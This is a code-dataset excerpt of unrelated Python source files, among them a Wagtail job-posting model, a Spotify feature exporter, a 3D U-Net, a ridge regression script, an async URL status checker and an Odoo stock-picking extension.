erstellen\",\n ),\n StreamFieldPanel(\"after_jobs\"),\n StreamFieldPanel(\"empty\"),\n ]\n\n class Meta:\n verbose_name = \"Auflistung von Stellenausschreibungen\"\n verbose_name_plural = \"Auflistungen von Stellenausschreibungen\"\n\n\nclass JobOfferPage(StandardPage):\n parent_page_types = [\"JobOfferIndexPage\"]\n subpage_types = [\"core.StandardPage\"]\n\n valid_through = models.DateTimeField(\n \"Bewerbungsfrist\",\n blank=True,\n null=True,\n validators=[\n MinValueValidator(timezone.now, message=\"Sollte in der Zukunft liegen\")\n ],\n )\n job_title = models.CharField(\"Job-Titel\", max_length=255)\n job_location = models.CharField(\n \"Job-Ort\", max_length=255, blank=True, default=\"Hannover\"\n )\n hiring_organization_name = models.CharField(\n \"Arbeitgeber\", max_length=255, default=\"JANUN e.V.\"\n )\n hiring_organization_url = models.URLField(\n \"Website des Arbeitgebers\", blank=True, default=\"https://www.janun.de/\"\n )\n EMPLOYMENT_TYPE_CHOICES = [\n (\"FULL_TIME\", \"Vollzeit\"),\n (\"PART_TIME\", \"Teilzeit\"),\n (\"CONTRACTOR\", \"Auftragnehmer\"),\n (\"TEMPORARY\", \"befristet\"),\n (\"INTERN\", \"Praktikum\"),\n (\"VOLUNTEER\", \"Freiwilligendienst\"),\n (\"PER_DIEM\", \"tageweise\"),\n (\"OTHER\", \"anderes\"),\n ]\n employment_type = ChoiceArrayField(\n models.CharField(max_length=20, choices=EMPLOYMENT_TYPE_CHOICES),\n verbose_name=\"Art der Anstellung\",\n blank=True,\n null=True,\n )\n base_salary_amount = models.DecimalField(\n \"Grundgehalt\", blank=True, null=True, decimal_places=2, max_digits=10\n )\n BASE_SALARY_UNIT_CHOICES = [\n (\"HOUR\", \"pro Stunde\"),\n (\"DAY\", \"pro Tag\"),\n (\"WEEK\", \"pro Woche\"),\n (\"MONTH\", \"pro Monat\"),\n (\"YEAR\", \"pro Jahr\"),\n ]\n base_salary_unit = models.CharField(\n \"Zeitraum für Grundgehalt\",\n max_length=10,\n default=\"MONTH\",\n choices=BASE_SALARY_UNIT_CHOICES,\n )\n auto_unpublish = models.BooleanField(\n \"Automatisch depublizieren\",\n help_text=\"Depubliziert die Seite automatisch nach der Bewerbungsfrist\",\n default=True,\n )\n\n def get_employment_type_display(self) -> [str]:\n result = []\n for employment_type in self.employment_type:\n for choice in self.EMPLOYMENT_TYPE_CHOICES:\n if employment_type == choice[0]:\n result.append(choice[1])\n return result\n\n @property\n def structured_data(self):\n return {\n \"@type\": \"JobPosting\",\n \"title\": self.job_title,\n \"description\": str(self.body),\n \"datePosted\": self.first_published_at,\n \"validThrough\": self.valid_through,\n \"hiringOrganization\": {\n \"@type\": \"Organization\",\n \"name\": self.hiring_organization_name,\n \"sameAs\": self.hiring_organization_url,\n },\n \"jobLocation\": {\"@type\": \"Place\", \"address\": self.job_location},\n \"employmentType\": self.employment_type,\n \"baseSalary\": {\n \"@type\": \"MonetaryAmount\",\n \"currency\": \"EUR\",\n \"value\": {\n \"@type\": \"QuantitativeValue\",\n \"value\": self.base_salary_amount,\n \"unitText\": self.base_salary_unit,\n },\n },\n }\n\n def save(self, *args, **kwargs):\n if self.valid_through and self.auto_unpublish:\n self.expire_at = self.valid_through\n super().save(*args, **kwargs)\n\n content_panels = [\n FieldPanel(\"title\"),\n FieldPanel(\"subtitle\"),\n ImageChooserPanel(\"feed_image\"),\n MultiFieldPanel(\n [\n HelpPanel(\n \"<p>Sorgt für eine bessere Platzierung als Jobanzeige bei Google und co.</p>\"\n ),\n FieldPanel(\"job_title\"),\n FieldPanel(\"job_location\"),\n FieldPanel(\"hiring_organization_name\"),\n FieldPanel(\"hiring_organization_url\"),\n FieldPanel(\"valid_through\"),\n FieldPanel(\"auto_unpublish\"),\n FieldPanel(\"employment_type\", widget=forms.CheckboxSelectMultiple),\n FieldPanel(\"base_salary_amount\"),\n FieldPanel(\"base_salary_unit\"),\n ],\n heading=\"Infos\",\n ),\n StreamFieldPanel(\"body\"),\n ]\n\n class Meta:\n verbose_name = \"Stellenausschreibung\"\n verbose_name_plural = \"Stellenausschreibungen\"\n","sub_path":"jobs/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":7240,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"80812680","text":"import pandas as pd \nimport spotipy \nsp = spotipy.Spotify() \nfrom spotipy.oauth2 import SpotifyClientCredentials \n\ncid =\"YOUR_CLIENT_ID\" \nsecret = \"YOUR_CLIENT_SECRET\" \nclient_credentials_manager = SpotifyClientCredentials(client_id=cid, client_secret=secret) \nsp = spotipy.Spotify(client_credentials_manager=client_credentials_manager) \nsp.trace=False \n\nplaylist = sp.user_playlist(\"USERNAME\", \"PLAYLIST_ID\")\nplaylist_tracks = playlist[\"tracks\"]\nplaylist_songs = playlist_tracks[\"items\"]\nwhile playlist_tracks[\"next\"]:\n\tplaylist_tracks = sp.next(playlist_tracks)\n\tfor item in playlist_tracks[\"items\"]:\n\t\tplaylist_songs.append(item)\n\nplaylist_ids = []\nfor i in range(len(playlist_songs)):\n\tplaylist_ids.append(playlist_songs[i]['track']['id'])\n\nfeatures = []\nj = 0\nfor i in range(0,len(playlist_ids),50):\n\taudio_features = sp.audio_features(playlist_ids[i:i+50])\n\tfor track in audio_features:\n\t\ttrack['song_title'] = playlist_songs[j]['track']['name']\n\t\ttrack['artist'] = playlist_songs[j]['track']['artists'][0]['name']\n\t\tj = j+1\n\t\tfeatures.append(track)\n\ndf = pd.DataFrame(features) \ndf.to_csv('features.csv')\n","sub_path":"playlist_features.py","file_name":"playlist_features.py","file_ext":"py","file_size_in_byte":1112,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"392869913","text":"#!/usr/bin/env python\n# encoding: utf-8\n\n\"\"\"Tree things.\"\"\"\n\nfrom collections import deque\nfrom sys import stdout\n\nclass Node(object):\n\n def __init__(self, val, left=None, right=None):\n self.val = val\n self.left = left\n self.right = right\n\ndef show(node):\n cur_level = 0\n nodes = deque()\n nodes.append((node, 0))\n while nodes:\n node, level = nodes.popleft()\n if level != cur_level:\n assert level == cur_level + 1\n cur_level = level\n stdout.write('\\n')\n stdout.write('%s' % (node.val, ))\n if node.left:\n nodes.append((node.left, level + 1))\n if node.right:\n nodes.append((node.right, level + 1))\n stdout.write('\\n')\n\nif __name__ == '__main__':\n n5 = Node(5)\n n4 = Node(4)\n n3 = Node(3, n5)\n n2 = Node(2, n3, n4)\n n1 = Node(1, n2)\n show(n1)\n","sub_path":"lang/c/tree/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":800,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"507095572","text":"# Создать (программно) текстовый файл, записать в него программно набор чисел, разделённых пробелами.\n# Программа должна подсчитывать сумму чисел в файле и выводить её на экран.\n\nimport random\n\nn = (random.random() for _ in range(0, random.randrange(1, 10)))\nwith open(r'out5.txt', 'w') as f_out:\n print(*n, file=f_out)\n\nwith open(r'out5.txt', 'r') as f_out:\n print(sum((float(i) for i in f_out.readline().split())))\n","sub_path":"ДЗ Урок 5/main5.py","file_name":"main5.py","file_ext":"py","file_size_in_byte":567,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"352889323","text":"\"\"\"empty message\n\nRevision ID: c9468bbd7405\nRevises: 327b13989ec1\nCreate Date: 2021-03-30 10:14:00.234627\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\nimport sqlalchemy_utils\n\n\n# revision identifiers, used by Alembic.\nrevision = 'c9468bbd7405'\ndown_revision = '327b13989ec1'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n with op.batch_alter_table('answer', schema=None) as batch_op:\n batch_op.add_column(sa.Column('modify_date', sa.DateTime(), nullable=True))\n\n with op.batch_alter_table('question', schema=None) as batch_op:\n batch_op.add_column(sa.Column('modify_date', sa.DateTime(), nullable=True))\n\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n with op.batch_alter_table('question', schema=None) as batch_op:\n batch_op.drop_column('modify_date')\n\n with op.batch_alter_table('answer', schema=None) as batch_op:\n batch_op.drop_column('modify_date')\n\n # ### end Alembic commands ###\n","sub_path":"migrations/versions/c9468bbd7405_.py","file_name":"c9468bbd7405_.py","file_ext":"py","file_size_in_byte":1087,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"319217566","text":"\"\"\"\nmain.py\n\nProject: \nThe Effect of Prey Size on Emergent Predator Group Sizes: An Agent-Based Model\n\nGroup5 (A. Lind, R. Colley, S. de Groot, V. Botha, N. El Mahjoubi)\nAgent-Based-Modeling (M. Lee and D. Roy)\nUniversity of Amsterdam\n\nThis file contains the script to run to model in the command line \n\nUsage: Set the parameters in the parameters.py file \n - just run: python main.py\n - run and output data: python main.py data\n\nNote: see README.md for required packages\n\"\"\"\n\nfrom agents import *\nfrom helpers import *\nfrom model import *\nfrom parameters import *\n\nimport matplotlib.backends.backend_pdf\nimport pandas as pd\nimport sys \n\n\ndef main():\n \"\"\"\n Initializes and runs the model with parameters from the parameters.py file\n \"\"\"\n\n # determine if data needs to be outputed \n output_data = False \n\n if len(sys.argv) > 2:\n sys.stdout.write(\"Usage: \\n - just run: python model.py\\n \"\n \"- run and output data: python model.py data\\n\")\n sys.exit(1)\n\n elif len(sys.argv) == 2:\n if sys.argv[1] == \"data\":\n output_data = True\n else:\n sys.stdout.write(\"Usage: \\n - just run: python model.py\\n \"\n \"- run and output data: python model.py data\\n\")\n sys.exit(1)\n\n # initialize with parameters from parameters.py\n model = PredatorPrey(height = height,\n width = width,\n initial_prey = initial_prey,\n initial_predators= initial_predators,\n carrying_capacity = carrying_capacity, \n prey_reproduction_chance= prey_reproduction_chance,\n predator_death_chance = predator_death_chance,\n prey_value = prey_value,\n defection_gain = defection_gain,\n hunting_ability = hunting_ability, \n memory_window = memory_window,\n ratio_MT = ratio_MT, \n ratio_MC = ratio_MC)\n \n # run model\n model.run_model(progress_indicator = True)\n\n\n data = model.datacollector.get_model_vars_dataframe()\n\n # print the model output of the last time step\n print_modeloutput_at_last_timestep(data)\n\n if output_data:\n output_model_data(data)\n\ndef print_modeloutput_at_last_timestep(data):\n\t\"\"\"\n\tprints the model output of the last time step\n Args:\n data (pandas Dataframe): Dataframe containing model \n output from datacollector\n\t\"\"\"\n\n\n\tlast_data = data.tail(1)\n\n\tprint(\"\\nMODEL OUTPUT OF LAST TIME STEP:\")\n\tfor col in last_data:\n\t\t# print(col)\n\t\tprint(col + \": \" + last_data[col].to_string(index=False))\n\n\ndef output_model_data(data): \n \"\"\"\n Saves model output\n - csv file of data ('data.csv')\n - pdf containing all plots ('plots.pdf':\n * nr prey and predators\n * ratio prey/predator\n * ratio cooperators\n * average group size\n * counts of group sizes \n\n Args:\n data (pandas Dataframe): Dataframe containing model \n output from datacollector\n \"\"\"\n\n\n # save model data in csv \n data.to_csv(\"data.csv\")\n\n # plot model output \n plot1 = data[['Prey','Predator']].plot()\n plot1.set_xlabel(\"Time steps\")\n fig1 = plot1.get_figure()\n\n plot2 = data[['Ratio Prey/Predator']].plot()\n plot2.set_xlabel(\"Time steps\")\n fig2 = plot2.get_figure()\n\n plot3 = data[['Ratio cooperators']].plot()\n plot3.set_xlabel(\"Time steps\")\n fig3 = plot3.get_figure()\n\n\n plot4 = data[['Average group size']].plot()\n plot4.set_xlabel(\"Time steps\")\n fig4 = plot4.get_figure()\n\n\n plot5 = data[['nr groups of size 1',\n 'nr groups of size 2', \n 'nr groups of size 3',\n 'nr groups of size 4',\n 'nr groups of size 5',\n 'nr groups of size 6',\n 'nr groups of size 7',\n 'nr groups of size 8',\n 'nr groups of size 9',\n 'nr groups of size 10',\n 'nr groups of size 11',\n 'nr groups of size 12',\n 'nr groups of size 13',\n 'nr groups of size 14',\n 'nr groups of size 15',\n 'nr groups of size 16',\n 'nr groups of size 17',\n 'nr groups of size 18',\n 'nr groups of size 19',\n 'nr groups of size 20',\n 'nr groups of size >=21']].plot()\n plot5.set_xlabel(\"Time steps\")\n plot5.legend(loc=2, prop={'size': 6})\n fig5 = plot5.get_figure()\n\n # save all plots in one pdf file\n pdf = matplotlib.backends.backend_pdf.PdfPages(\"plots.pdf\")\n for fig in range(1, 6):\n pdf.savefig( fig )\n pdf.close()\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"model/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":5055,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"265469960","text":"import numpy as np\nimport matplotlib.pyplot as plt\nimport pandas as pd\nimport math\nimport random\n\n# load training data input\ndf = pd.read_csv('./1-prostate-training-data.csv')\nX_train = []\ny_train = []\nnum_record = df['lcavol'].count()\nvect_input = []\n\nfor i in range(num_record):\n vect_input.append(np.array(df.iloc[[i]])[0].tolist())\n\n# Build X_train and y_train\nfor i in range(num_record):\n X_train.append(vect_input[i][:8])\n y_train.append(vect_input[i][8]) \n\n# Split data to 2 part training and validation \nX_valid = X_train[180:]\nX_training = X_train[:180]\ny_valid = y_train[180:]\ny_training = y_train[:180]\n\n# Building X bar and y \nX_training = np.asarray(X_training)\nX_valid = np.asarray(X_valid)\none_train = np.ones((X_training.shape[0], 1))\none_valid = np.ones((X_valid.shape[0], 1))\nX_valid = np.concatenate((one_valid, X_valid), axis = 1)\nX_training = np.concatenate((one_train, X_training), axis = 1)\ny_training = np.asarray(y_training).T\ny_valid = np.asarray(y_valid).T\n\n# w Ridge regession\nm = np.dot(X_training.T, X_training)\nn = np.dot(X_training.T, y_training)\nI = np.eye(len(X_training[0]))\n\nlda = np.arange(0.8,2,0.001) # array init lambda\nw = []\nres = []\nres_valid = []\nfor i in range(len(lda)):\n sum_in = m+lda[i]*I\n w.append(np.dot(np.linalg.pinv(sum_in), n))\n res.append(np.dot(X_training, w[i]).tolist())\n res_valid.append(np.dot(X_valid, w[i]).tolist())\n\ndef sum_loss(x):\n sum_loss = 0\n for i in x:\n sum_loss += i*i\n return sum_loss\n\nminimum = 100000000\nindex = -1\nfor i in range(len(lda)):\n temp = res_valid[i] - y_valid\n if(minimum > sum_loss(temp)):\n minimum = sum_loss(temp)\n index = i\nprint(\"w computed : \\n\", w[index])\nres[index].extend(res_valid[index]) \nprint('\\n The best value of lambda is: ', lda[index])\n\n# compute test data from w[index]\n# read file test\ndf_test = pd.read_csv('20141943-test.csv',header=None)\nn_test = len(df_test.index)\nx_test = []\none_test = np.ones((n_test, 1))\n\nfor i in range(n_test):\n x_test.append(np.asarray(df_test.iloc[[i]])[0][:8])\n\nx_test = np.asarray(x_test)\nx_test = np.concatenate((one_test, x_test), axis = 1)\npredict = np.dot(x_test, w[index])\nprint('Predict:',predict)\n# Save predict to csv\ndf_test.iloc[5:,8] = predict[5:]\ndf_test.to_csv('20141943.csv', sep=',', encoding='utf-8', index = False,header=False)\n","sub_path":"data/final_responses_2/IT4866_20141943/RidgeRegression.py","file_name":"RidgeRegression.py","file_ext":"py","file_size_in_byte":2352,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"27597091","text":"import nipype.pipeline.engine as pe\nimport nipype.interfaces.utility as util\nimport nipype.interfaces.io as nio\nimport nipype.interfaces.ants as ants\nimport nipype.interfaces.freesurfer as fs\nimport nipype.interfaces.fsl as fsl\nfrom nipype.workflows.smri.ants.antsRegistrationBuildTemplate import antsRegistrationTemplateBuildSingleIterationWF\nimport os\nfrom variables import workingdir, freesurferdir, subjects\n\n\ndef create_custom_template(name=\"create_custom_template\", n_iterations = 6):\n tbuilder = pe.Workflow(name=name)\n inputspec = pe.Node(util.IdentityInterface(fields=[\"t1_volumes\"]), name=\"inputspec\")\n \n N4biasfield = pe.MapNode(ants.N4BiasFieldCorrection(), name=\"N4biasfield\", iterfield=['input_image'])\n N4biasfield.inputs.bspline_fitting_distance = 300\n N4biasfield.inputs.shrink_factor = 3\n N4biasfield.inputs.n_iterations = [50,50,30,20]\n N4biasfield.inputs.convergence_threshold = 1e-6\n N4biasfield.inputs.num_threads = 1\n \n tbuilder.connect(inputspec, \"t1_volumes\", N4biasfield, \"input_image\")\n# tbuilder.connect(inputspec, \"masks\", N4biasfield, \"mask_image\")\n \n initAvg = pe.Node(interface=ants.AverageImages(), name ='initAvg')\n initAvg.inputs.dimension = 3\n initAvg.inputs.normalize = True\n\n tbuilder.connect(N4biasfield, \"output_image\", initAvg, \"images\")\n \n# sumMask = pe.Node(interface=ants.AverageImages(), name ='sumMask')\n# sumMask.inputs.dimension = 3\n# sumMask.inputs.normalize = False\n\n# tbuilder.connect(inputspec, \"masks\", sumMask, \"images\")\n \n prev_step_output = (initAvg, 'output_average_image')\n \n def make_dict(l):\n out = []\n for i in l:\n out.append({'T1':i})\n return out\n \n for i in range(n_iterations):\n buildTemplateIteration = antsRegistrationTemplateBuildSingleIterationWF('iteration%d'%(i+1))\n BeginANTS = buildTemplateIteration.get_node(\"BeginANTS\")\n BeginANTS.inputs.num_threads = 1\n #BeginANTS.plugin_args = {'submit_specs': 'request_memory = 6000\\nrequest_cpus = 32\\n'}\n\n tbuilder.connect(prev_step_output[0], prev_step_output[1], buildTemplateIteration, 'inputspec.fixed_image')\n# tbuilder.connect(sumMask,\"output_average_image\", BeginANTS, 'fixed_image_mask')\n# tbuilder.connect(inputspec, \"masks\", BeginANTS, 'moving_image_mask')\n buildTemplateIteration.inputs.inputspec.interpolationMapping = {'T1':'Linear'}\n buildTemplateIteration.inputs.inputspec.registrationImageTypes = ['T1']\n \n tbuilder.connect(N4biasfield, (\"output_image\", make_dict), buildTemplateIteration, 'inputspec.ListOfImagesDictionaries')\n \n prev_step_output = (buildTemplateIteration, 'outputspec.template')\n \n return tbuilder\n\nif __name__ == '__main__':\n wf = pe.Workflow(name=\"main_workflow\")\n wf.base_dir = os.path.join(workingdir, \"ants_template\")\n wf.config['execution']['crashdump_dir'] = wf.base_dir + \"/crash_files\"\n \n datagrabber = pe.MapNode(nio.FreeSurferSource(), \n name=\"datagrabber\",\n overwrite=False,\n iterfield=['subject_id'])\n datagrabber.inputs.subjects_dir = freesurferdir\n datagrabber.inputs.subject_id = subjects\n \n threshold = pe.MapNode(fs.Binarize(min=0.5, out_type='nii.gz', dilate = 1),\n iterfield=['in_file'],\n name='threshold')\n \n def get_aparc_aseg(files):\n out_l = []\n for l in files:\n for name in l:\n if 'aparc+aseg' in name:\n out_l.append(name)\n break\n if out_l:\n return out_l\n else:\n raise ValueError('aparc+aseg.mgz not found')\n \n wf.connect([(datagrabber, threshold, [(('aparc_aseg', get_aparc_aseg), 'in_file')])])\n \n mask = pe.MapNode(fs.ApplyMask(out_file='brain.nii.gz'), iterfield=[\"in_file\", 'mask_file'], name=\"mask\")\n wf.connect([(datagrabber, mask, [('orig', 'in_file')]),\n (threshold, mask, [('binary_file', 'mask_file')])])\n \n template_wf = create_custom_template()\n \n wf.connect(mask, \"out_file\", template_wf, \"inputspec.t1_volumes\")\n #wf.connect(threshold, \"binary_file\", template_wf, \"inputspec.masks\")\n \n wf.write_graph()\n wf.run(plugin=\"Condor\")\n","sub_path":"src/enhanced_nki/create_custom_template.py","file_name":"create_custom_template.py","file_ext":"py","file_size_in_byte":4364,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"282656426","text":"import torch\nimport torch.nn as nn\nfrom torch.nn import functional as F\n\nimport math\n\nimport numpy as np\n\ntorch.manual_seed(0)\n\n\"\"\"\nThis code is based in this article - U-Net: Convolutional Networks for Biomedical Image Segmentation - https://arxiv.org/pdf/1505.04597.pdf\n\"\"\"\n\n\nclass UNet3D(nn.Module):\n def __init__(self, in_channels, out_channels, init_depth):\n super().__init__()\n assert in_channels >= 1, \"in_channels must be greater than 0\"\n assert out_channels >= 1, \"out_channels must be greater than 0\"\n assert init_depth >= 1, \"init_depth must be greater than 0\"\n # Encoder part\n self.encoder_1 = self.layers_block(in_channels, init_depth)\n self.encoder_maxpool_1 = nn.MaxPool3d(kernel_size=2, stride=2)\n self.encoder_2 = self.layers_block(1*init_depth, 2*init_depth)\n self.encoder_maxpool_2 = nn.MaxPool3d(kernel_size=2, stride=2)\n self.encoder_3 = self.layers_block(2*init_depth, 4*init_depth)\n self.encoder_maxpool_3 = nn.MaxPool3d(kernel_size=2, stride=2)\n self.encoder_4 = self.layers_block(4*init_depth, 8*init_depth)\n self.encoder_maxpool_4 = nn.MaxPool3d(kernel_size=2, stride=2)\n # Bottleneck part\n self.encoder_5 = self.layers_block(\n 8*init_depth, 16*init_depth) # bottleneck\n # Decoder part\n self.decoder_1 = self.layers_block(16*init_depth, 8*init_depth)\n self.decoder_upsampling_1 = nn.ConvTranspose3d(\n in_channels=16*init_depth, out_channels=8*init_depth, kernel_size=2, stride=2, padding=0)\n self.decoder_2 = self.layers_block(8*init_depth, 4*init_depth)\n self.decoder_upsampling_2 = nn.ConvTranspose3d(\n in_channels=8*init_depth, out_channels=4*init_depth, kernel_size=2, stride=2, padding=0)\n self.decoder_3 = self.layers_block(4*init_depth, 2*init_depth)\n self.decoder_upsampling_3 = nn.ConvTranspose3d(\n in_channels=4*init_depth, out_channels=2*init_depth, kernel_size=2, stride=2, padding=0)\n self.decoder_4 = self.layers_block(2*init_depth, init_depth)\n self.decoder_upsampling_4 = nn.ConvTranspose3d(\n in_channels=2*init_depth, out_channels=1*init_depth, kernel_size=2, stride=2, padding=0)\n # Output\n self.output = nn.Conv3d(\n in_channels=init_depth, out_channels=out_channels, kernel_size=1, stride=1)\n\n @staticmethod\n def layers_block(in_channels, out_channels):\n \"\"\"\n This static method create a convolutional block useful for the U-Net implementation\n \"\"\"\n return nn.Sequential(nn.Conv3d(in_channels=in_channels, out_channels=out_channels, kernel_size=3, stride=1, padding=1),\n \n nn.InstanceNorm3d(num_features=out_channels),\n nn.ReLU(),\n nn.Conv3d(\n in_channels=out_channels, out_channels=out_channels, kernel_size=3, stride=1, padding=1),\n nn.InstanceNorm3d(num_features=out_channels),\n nn.ReLU()\n )\n\n @staticmethod\n def calculate_pad(x_1, x_2):\n padding_x = np.uint8(x_1.shape[2] - x_2.shape[2])\n padding_y = np.uint8(x_1.shape[3] - x_2.shape[3])\n padding_z = np.uint8(x_1.shape[4] - x_2.shape[4])\n first_dim_x = math.floor(padding_x/2)\n second_dim_x = padding_x - first_dim_x\n first_dim_y = math.floor(padding_y/2)\n second_dim_y = padding_y - first_dim_y\n first_dim_z = math.floor(padding_z/2)\n second_dim_z = padding_z - first_dim_z\n return F.pad(x_2, (first_dim_y, second_dim_y, first_dim_x, second_dim_x, second_dim_z, second_dim_z))\n\n def forward(self, x):\n #assert x.shape[2] % 2 == 0 and x.shape[3] % 2 == 0, \"The image input dimensions must be divisible by 2\"\n encoder_1 = self.encoder_1(x)\n encoder_2 = self.encoder_2(self.encoder_maxpool_1(encoder_1))\n encoder_3 = self.encoder_3(self.encoder_maxpool_2(encoder_2))\n encoder_4 = self.encoder_4(self.encoder_maxpool_3(encoder_3))\n encoder_5 = self.encoder_5(self.encoder_maxpool_4(encoder_4))\n encoder_5 = self.calculate_pad(\n encoder_4, self.decoder_upsampling_1(encoder_5))\n decoder_1 = self.decoder_1(torch.cat([encoder_4, encoder_5], dim=1))\n decoder_1 = self.calculate_pad(\n encoder_3, self.decoder_upsampling_2(decoder_1))\n decoder_2 = self.decoder_2(torch.cat([encoder_3, decoder_1], dim=1))\n decoder_2 = self.calculate_pad(\n encoder_2, self.decoder_upsampling_3(decoder_2))\n decoder_3 = self.decoder_3(torch.cat([encoder_2, decoder_2], dim=1))\n decoder_3 = self.calculate_pad(\n encoder_1, self.decoder_upsampling_4(decoder_3))\n decoder_4 = self.decoder_4(torch.cat([encoder_1, decoder_3], dim=1))\n output = self.output(decoder_4)\n return output\n\nif __name__ == '__main__':\n pass\n","sub_path":"models/unet_3d.py","file_name":"unet_3d.py","file_ext":"py","file_size_in_byte":5037,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"242916280","text":"from enum import Enum\nimport numpy as np\n\nclass coin(Enum):\n #result of coin flip\n HEADS = 0\n TAILS = 1\n\nclass game(object):\n def __init__(self, id):\n self._id = id\n self._coin = coin.TAILS\n self._count_wins = 0\n self._count_tails = 0\n self._flip_number = 1\n self._total_flips = 20\n self._rnd = np.random\n self._rnd.seed(self._id * self._flip_number)\n\n def next_flip(self):\n# use previous flip as \"if\" statement, then adjust tails and win count for next flip\n if self._coin == coin.TAILS:\n if self._rnd.random_sample() > 0.4:\n self._coin = coin.TAILS\n self._count_tails += 1\n\n if self._rnd.random_sample() < 0.4:\n if self._count_tails >= 2:\n self._count_wins += 1\n self._coin = coin.HEADS\n self._count_tails = 0\n\n elif self._coin == coin.HEADS:\n if self._rnd.random_sample() > 0.4:\n self._coin = coin.TAILS\n self._count_tails = 1\n\n if self._rnd.random_sample() < 0.4:\n self._coin = coin.HEADS\n self._count_tails = 0\n\n self._flip_number += 1\n\n def play(self):\n for i in range(1, self._total_flips+1):\n self._rnd = np.random\n self._rnd.seed(self._id * self._flip_number)\n self.next_flip()\n\n def reward(self):\n self.play()\n self._payout = -250\n self._payout += 100*self._count_wins\n return self._payout\n\nclass cohort:\n # initialize empty list of players (1000 id's)\n def __init__(self, id, numPlayers):\n self._players = []\n n = 1\n while n <= numPlayers:\n player = game(id=id * numPlayers + n)\n self._players.append(player)\n n += 1\n\n def simulate(self):\n game_rewards = []\n for player in self._players:\n game_rewards.append(player.reward())\n #calculate average of all games\n return sum(game_rewards)/len(game_rewards)\n\nestimate = cohort(id=1, numPlayers=1000)\nprint(estimate.simulate())\n","sub_path":"HW4_NO_2.py","file_name":"HW4_NO_2.py","file_ext":"py","file_size_in_byte":2150,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"108814859","text":"import aiohttp\nimport asyncio\nimport aiofiles\nfrom pathlib import Path\nfrom .models import StatusCodeField\n\n\ndef write_into_db(data):\n p = StatusCodeField.objects.create(status=data)\n return p\n\n\ndef write_status_codes_into_file(data):\n with open('status.txt', 'a+') as file:\n file.write(f'{data}\\n')\n\n\nasync def make_requests(session, url):\n async with session.head(url, allow_redirects=False) as response:\n if response.status == 200:\n data = f'Server response from {url}: {response.status} OK'\n write_status_codes_into_file(data)\n write_into_db(data)\n\n\nasync def main(url):\n tasks = []\n data_folder = Path(__file__).resolve().parents[1].joinpath(\"data/new_cleaned_data.txt\")\n\n async with aiohttp.ClientSession() as session:\n async with aiofiles.open(data_folder, mode='r') as f:\n async for line in f:\n concatenated_url = url + line.strip()\n task = asyncio.create_task(make_requests(session, concatenated_url))\n tasks.append(task)\n await asyncio.gather(*tasks)\n","sub_path":"main_app/async_requests.py","file_name":"async_requests.py","file_ext":"py","file_size_in_byte":1099,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"1409894","text":"# -*- coding: utf-8 -*-\n\n\nfrom odoo import models, fields, api, _\nfrom odoo.exceptions import ValidationError\n\n\nclass Invoice(models.Model):\n _inherit = 'account.invoice'\n\n have_referral_guide = fields.Boolean('Tiene guía de remisión', default=False)\n\n\nclass ImmediateTransfer(models.TransientModel):\n _inherit = 'stock.immediate.transfer'\n\n @api.multi\n def process(self):\n \"\"\"\n ME: Colocamos factura que tiene GR.\n :return:\n \"\"\"\n result = super(ImmediateTransfer, self).process()\n pickings = self.pick_ids.filtered(lambda x: x.is_referral_guide)\n for picking in pickings:\n invoice = picking.invoice_id\n invoice.sudo().write({'have_referral_guide': True})\n return result\n\nclass Picking(models.Model):\n _inherit = 'stock.picking'\n\n @api.one\n @api.constrains('arrival_date')\n def _check_arrival_date(self):\n if self.arrival_date < self.scheduled_date.date():\n raise ValidationError(_(\"Fecha de llegada no puede ser menor a la prevista.\"))\n\n def _get_warehouse_street(self):\n warehouse = self.picking_type_id.warehouse_id\n if warehouse:\n street = warehouse.partner_id.street\n return street\n else:\n return 'Indefinido'\n\n @api.onchange('is_referral_guide')\n def _onchange_is_referral_guide(self):\n \"\"\"\n Al cambiar campo mostramos datos por defecto.\n :return:\n \"\"\"\n if self.is_referral_guide and self.partner_id:\n partner = self.partner_id\n partner_carrier = partner.property_stock_carrier\n self.starting_address = self._get_warehouse_street()\n self.arrival_address = partner.street\n self.carrier_id = partner_carrier.id if partner_carrier else False\n return {}\n\n is_referral_guide = fields.Boolean('Guía de remisión', default=False,\n copy=False,\n help=\"Técnico: Campo para indicar si EGRESO de inventario genera documento tributario.\")\n arrival_date = fields.Date('Fecha de llegada',\n default=fields.Date.today(),\n help=\"Fecha prevista de llegada del transporte a la dirección de llegada.\")\n starting_address = fields.Char('Dirección de partida')\n arrival_address = fields.Char('Dirección de llegada')\n route = fields.Text('Ruta')\n\n # TODO: Sin mostrar en formulario\n customs_document = fields.Char('Documeno aduanero')\n arrival_establishment = fields.Char('Código de establecimiento de llegada', size=3,\n help=\"Si conoce el código de establecimiento del SRI de llegada colocarlo en campo.\")\n\n\n # SRI\n @api.onchange('number')\n def _onchange_number(self):\n \"\"\"\n Rellenamos de 0 el secuencial\n :return:\n \"\"\"\n if self.number:\n self.number = self.number.zfill(9)\n\n @api.constrains('number')\n def _check_reference(self):\n \"\"\"\n Validamos qué secuencial este entre el rango ingresado en autorización.\n :return:\n \"\"\"\n if self.number and not self.is_electronic:\n self.sri_authorization_id.is_valid_number(int(self.number))\n\n 